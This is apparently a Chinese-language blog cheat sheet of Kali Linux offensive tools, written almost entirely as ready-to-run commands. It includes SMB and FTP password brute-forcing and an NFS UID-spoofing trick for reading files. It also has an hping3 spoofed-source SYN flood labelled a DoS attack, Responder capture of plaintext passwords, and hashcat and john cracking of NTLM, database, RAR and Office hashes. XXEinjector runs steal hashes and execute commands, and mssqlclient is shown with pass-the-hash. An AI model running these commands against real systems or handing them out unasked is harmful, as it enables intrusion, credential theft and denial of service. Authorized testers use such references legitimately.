关于kali的一些小工具

基于端口攻击的攻击基于smb的攻击 1.acccheck acccheck -t 192.168.1.1 -u root -p root -v //基础语法参数: -t/T 目标地址/批量字典 -p/P 密码/密码字典 -u/U 账号/账号字典 2.smbmap(smb信息收集器) smbmap -H 192.168.1.1 //收集smb共享的信息 smbmap -H 192.168.1.1 -u anonymous //匿名登录 smbmap -H 192.168.1.1 -u lee -p xinxin123 -d 域名 //域环境登陆 3.smbclient(smb客户端连接器) smbclient -N //192.168.1.1/IPC //连接ipc，不用询问密码 smbclient -L 172.16.0.10 -U arm554 //一般是389端口未授权访问 smbclient -L 172.16.0.10 -U arm554 -W rnm --pw-nt-hash //W是工作组，用hash登录 4.enum4linux(基于遍历sid) enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt 遍历sid的序列从1000-50000,写入enum4linux.txt里基于snmp协议的攻击 1.snmp-check snmp-check 192.168.1.109 -c public -v 2c 参数： -p?指定SNMP服务端口 -w?检查是否可写 -c?指定community（默认 public） -r?重试次数（默认1次） -v?指定snmp版本（1、2c，默认1） -t?超时时长（默认5秒） -d?禁用TCP 连接尝试 2.snmpwalk（弱口令探测器） snmpwalk的参数比较多，但是我们比较常用的就只有-v和-c参数 -v是版本，一般是1 2c 3 -c一般用public snmpwalk -v 2c -c public 10.1.1.1 .1.3.6.1.2.1.25.2.2 取得系统总内存 snmpwalk -v 2c -c public 10.1.1.1 hrSystemNumUsers 取得系统用户数 snmpwalk -v 2c -c public 10.1.1.1 .1.3.6.1.2.1.4.20 取得IP信息 snmpwalk -v 2c -c public 10.1.1.1 system 查看系统信息 snmpwalk -v 2c -c public 10.1.1.1 ifDescr 获取网卡信息 snmpwalk -r:$IP -c:public -os:1.3.6.1.4.1.2011.5.2.1.10.1 //获取用户名及加密密码其他端口 1.nfs 2049 1.rpcinfo rpcinfo -p ip 查看该主机挂载nfs端口没有 2.showmount showmount -e ip 显示出nfs挂载的目录 showmount -a IP // 挂载点 showmount IP // 连接的主机 showmount -d IP // 目录因为此端口接触的比较少，所以就花一点时间来记录一下 mkdir /temp/ //创建一个文件夹 mount -t nfs 192.168.1.172:/ /temp -o nolock //用temp，来挂载我们的nfs文件 df -h //访问192.168.1.172的磁盘信息如果我们没有权限去访问读取某些文件，那么我们可以uid操作 ls -al //获取文件所有者的UID（用户ID）和GUID（组ID） useradd passwd //在本地创建一个新用户，并将该用户的UID和名称修改为与文件所有者相同 vi /etc/passwd //然后修改uid，即可 su //然后以su执行我们刚刚创建的用户即可信息收集域名收集 1.dnsenum（域名爆破器） dnsenum baidu.com 参数： --dnsserver 8.8.8.8??指定DNS server -o report.xml??输出XML格式的文件 --enum??指定线程5，使用谷歌查询，进行whois查询 -w??进行whois查询 --noreverse??跳过反向域名查询 -f dns.txt??指定域名爆破字典 --threads??指定线程 2.dnsrecon（域名爆破器） dnsrecon -d sina.com.cn 基本的SOA、NS、A、AAAA、MX、SRV查询 dnsrecon -g -d sina.com.cn 标准加google dnsrecon -r 60.28.2.0/24 反向PTR查询域名 dnsrecon -D dictionary.txt sina.com.cn 字典爆破主机和子域名 dnsrecon -a -d sina.com.cn 标准加axfr区域传输 dnsrecon -z -d weberdns.de 利用NSEC记录获取区域内全部记录，无需爆破 dnsrecon -w -d sina.com.cn 标准加whois查询参数： -t brt??使用内建字典 --threads??指定线程数 -t std??默认的标准查询 -t tld??删除并尝试所有顶级域名(IANA) -t srv??只查srv记录（AD、voip电话） -t axfr??标准加axfr记录（-a） 3.dnswalk 参数： -r?#对指定域名的子域进行递归查询 -l?#检查区域文件中NS记录主机是否能返回正确的应答 -a?#发现重复的A记录发出告警 -i?#不检查域名中的无效字符 -d?#将调试状态信息输出到stderr -F?#检查PTR记录IP是否与对应A记录相符 -m?#仅检查上次运行后发生变化的记录 4.fierce（dns爆破） fierce -dns baidu.com 目录收集 1.nikto(扫描器) nikto -h 192.168.1.1 扫目录，-h指定地址 2.dirbuster https://192.168.160.1 (扫描器) 3.dirb (扫描器) dirb https://192.168.160.1 ./aspx.txt dirb https://192.168.160.1 ./aspx.txt ./dir.txt //多字典挂载 dirb https://192.168.160.1 ./aspx.txt -a "ua" -c "cookie" //自定义user-agent,cookie 主机探寻 1.dnstracer（路由跟踪） dnstracer -co4 -s . www.baidu.com 参数： -c?#不使用本地缓存 -s .?#指定初始查询的服务器是根域 -o?#只显示查询简介 -4?#不进行IPv6查询 2.hping3（发包工具）主要测试防火墙的拦截规则常规用法 hping3 192.168.1. 端口扫描 hping3 192.168.1.1 -S -8 1-1024 LandAttack hping3 192.168.1.1 -S -a 192.168.1.1 -p 80 ICMP路由追踪 hping3 www.baidu.com -T -V -1 DoS Attack hping3 192.168.1.1 -V -d 100 -S -w 64 -p 445 -s 445 --flood --rand-source 基础参数： -c 限制发送总数 -T 路由探测 -i 发包间隔X秒，ux 微妙 -e 指定特征码／数据内容 --flood 利用主机最大性能发包 -E 指定文件内容作为数据发送 -I 指定网卡 -d 控制数据段大小 -D debug -z Ctrl +z 绑定TTL值，按一下TTL值加一，按两下减一协议选择：【*】默认使用TCP协议，默认端口0，无任何flag -0 #rawip,默认TCP为上层协议，但无TCP头 -9 listen模式，此处和-e 连用可以匹配特征码 -H 指定IP头协议字段，只能工作在rawip模式下 -8 scan模式，对目标端口进行扫描(-S/F/X/Y/A/R/P/U) -1 ICMP模式，发送icmp包 -2 发送UDP包，默认端口0 定制IP头： -a 伪造源IP -f IP数据段每16字节分片，-m 指定具体数值 --rand-source 随机伪造原地址 -r 发现IPID变化规律（注意看id 字段） --rand-dest 随机目的地址 -N 指定IPID，默认随机（当需要分片发送数据包时使用） -t 指定TTL值定制TCP／UDP -s 指定源端口（第一个包会是被指定的端口，后续包的源端口会依次加一） --tcp-timestamp 启动时间戳选项，猜测远程UP主机时间 -p 指定目标端口 --tcp-mss 指定最大TCP段大小 -w 指定window 大小（可用于进行slowhttp攻击） -b 指定checksum -M 指定sequence number -Q 发现目标机器sequence number变化规律 3. unicornscan（基于ARP的扫描工具） unicornscan -mU 192.168.1.100 4.netdiscover（基于ARP的扫描工具） netdiscover -r 192.168.1.0/24 -i wlan0 5.arpscan（基于ARP的扫描工具） arp-scan --interface=wlan0 --localnet 6.tcpdump(捕获ICMP数据包) tcpdump -i tun0 icmp 基于内网渗透 1.responder（基于内网WPAD的中间人攻击）语法: responder -I eth0 -wFb 获取内网请求明文密码 2.ldapsearch(内网渗透信息收集的工具) 参数说明： -x 进行简单认证 -b 指定要查询的根节点 -H 服务器地址 -w 绑定DN的密码 -D 用来绑定服务器的DN dapsearch -x -H Querier.NetNTLMv2 /usr/share/mima.txt //破解NetNTLMv2hash hashcat -a 0 -m 1000 hash ./dic.txt 1000是ntlm-hash hashcat -a 0 hash.txt password.txt -o result.txt //批量破解 hashcat -a 3 -m 300 --force 6A39F250FBF1C33310D48BB5596D9DD703BEBB8B //破解mysql4.1/5(password)函数 hashcat -a 3 -m 132 --force 0x01008c8006c224f71f6bf0036f78d863c3c4ff53f8c3c48edafb //破解mssql hashcat -a 0 -m 1800 hash 1.txt -D 1 //这个是破解SHA-512，-D 1调用CUP设备进行运算这里顺便补充一下格式 $1(5)(6)$ 分别表示md5 SHA-256 SHA-512 hashcat -a 3 -m 13000 --force $rar5$16$639e9ce8344c680da12e8bdd4346a6a3$15$a2b056a21a9836d8d48c2844d171b73d$8$04a52d2224ad082e //破解rar文件压缩密码 hashcat -a 3 -m 9600 $office$*2013*100000*256*16*e4a3eb629c*577f8d8b2e1c5f60fed76e62327b38d28f25230f6c7dfd66588d9ca8097aabb9 --force //破解Office文件 6.john(也是破解hash的) john --worldlist=/usr/share/mima.txt Querier.NetNTLMv2 7.sslscan https://192.168.160.1 (能扫心脏滴血) 8.svwar (定位sip extension的) 语法：svwar -e100-999 10.0.0.1（一般配合某套系统打组合拳用），比如Elastix 系统其他工具 1.7z (解压工具) 2.medusa（爆破工具） medusa -h *.*.*.* -U u.txt -P p.txt -e ns -O ok.txt -t 3 -T 3 -v 6 -M ftp 3.rar2john zip2john rar2john 1.rar //zip,rar,还有office文件 python3 office2john.py 1.docx 一些重要的工具 whatweb whatweb -v 3 192.168.159.1 单独探测 whatweb 112.125.93.227/24 --url-suffix=":8080" 扫了某一个C段，批量探测端口 whatweb -a 3 --proxy-user admin:passwoed www.dvwa.com/login.php --proxy-user admin:password通过--proxy-user的方式可以指定用户名和密码进行探测 wpscan wpscan --url https://www.xxxxx.wiki/ 扫网站 wpscan --url https://www.xxxxxxx.wiki/ --enumerate u 我们可以对其用户进行枚举 wpscan --url https://www.xxxxx.wiki/ -e u --wordlist /root/桌面/password.txt 用字典 wpscan -u https://www.xxxxx.wiki/ -enumerate p 扫插件 wpscan --url https://www.xxxxx.wiki/ --enumerate vp 扫插件内容 wpscan --url https://www.xxxxx.wiki --enumerate t 扫主题 wpscan --url https://www.xxxxxx.wiki --enumerate vt 扫主题存在的漏洞 wpscan -u https://www.xxxxxx.wiki/ -enumerate tt 扫文件漏洞 joomscan joomscan -u http://192.168.1.109/ 扫网站 msscan masscan 10.0.0.0/8 -p80 --banners --source-ip x.x.x.x 获取banner信息 masscan -p80,3306,8080-8100 45.153.42.0/24 我用的最多的命令 XXEinjector (1)枚举HTTPS应用程序中的/etc目录 ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl (2)使用gopher（OOB方法）枚举/etc目录： ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher (3)二次漏洞利用 ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt (4)使用HTTP带外方法和netdoc协议对文件进行爆破攻击 ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc (5)通过直接性漏洞利用方式进行资源枚举 ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK (6)枚举未过滤的端口 ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all (7)窃取Windows哈希 ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes (8)使用Java jar上传文件： ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf (9)使用PHP expect执行系统指令 ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls (10)测试XSLT注入 ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt (11)记录请求信息 ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.tx mssqlclient.py python3 mssqlclient.py cpwgp:password@192.168.1.1 基于mssql账户认证 python3 mssqlclient.py leecinsy/cpwgp:password@192.168.1.1 -windows-auth 基于windows认证 python3 mssqlclient.py cpwgp:password@192.168.1.1 -file command.txt 执行command里的命令执行sql命令 python3 mssqlclient.py -p 1433 -hash :aaaa leecinsy/cpwgp@192.168.1.1 -file sql.txt -windows-auth 用hash执行

渗透工具

关于kali的一些小工具

相关

一款集合大量渗透工具的GUI版工具

标签